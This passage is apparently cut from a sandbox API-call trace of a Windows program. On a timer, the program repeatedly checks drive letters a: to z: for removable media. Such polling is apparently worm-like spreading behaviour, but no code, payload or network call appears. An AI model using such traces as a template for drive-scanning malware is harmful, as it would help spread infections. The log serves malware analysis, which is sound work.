(lpRootPathName="l:\\") returned 0x1 [0221.592] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.592] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.592] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.592] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.592] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.593] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.593] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.593] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.593] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.593] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.596] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.596] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.596] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.596] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0221.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0221.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0221.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0221.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.597] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0221.597] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0221.597] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0221.598] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0221.598] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0221.598] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0221.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0221.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0221.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0221.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0221.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0221.599] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0221.599] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0221.599] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.600] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.600] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0221.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0221.600] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0221.600] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0221.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0221.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.600] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0221.600] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0221.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0221.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.601] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0221.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0221.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0221.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0221.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0221.601] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0221.601] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.601] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.601] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.601] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.602] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.602] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.602] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.602] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.603] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.603] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.603] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.603] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.603] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.604] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.604] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.604] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.605] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.605] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.605] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.605] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.606] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.606] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.606] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.606] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.606] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.606] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.607] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0221.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0221.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0221.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0221.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.607] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0221.607] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0221.607] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0221.607] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0221.608] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0221.608] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0221.608] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0221.608] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0221.608] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0221.608] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0221.608] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0221.608] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0221.608] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0221.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0221.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.609] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0221.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0221.609] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.609] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.609] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.609] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0221.609] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0221.609] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0221.609] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0221.610] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0221.610] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0221.610] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0221.610] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0221.610] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0221.610] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0221.610] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0221.611] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0221.611] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0221.611] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0221.611] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0221.611] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0221.611] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0221.612] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0221.612] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0221.612] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0221.612] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0221.612] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0221.612] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0221.612] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0221.613] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0221.613] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0221.613] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0221.613] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0221.613] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0221.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0221.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0221.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0221.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0221.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0221.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0221.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0221.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0221.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0221.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0221.614] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0221.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0221.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0221.615] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0221.615] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0221.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0221.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0221.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0221.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0221.615] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0221.616] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0221.616] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0221.616] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0221.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0221.616] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0221.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0221.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0221.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0221.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0221.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0221.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0221.763] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0221.764] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0221.764] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0221.764] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0221.764] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0221.764] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0221.765] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0221.765] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0221.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0221.765] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0221.765] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0221.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0221.766] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0221.766] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0221.766] RtlAllocateHeap (HeapHandle=0x12c0000, 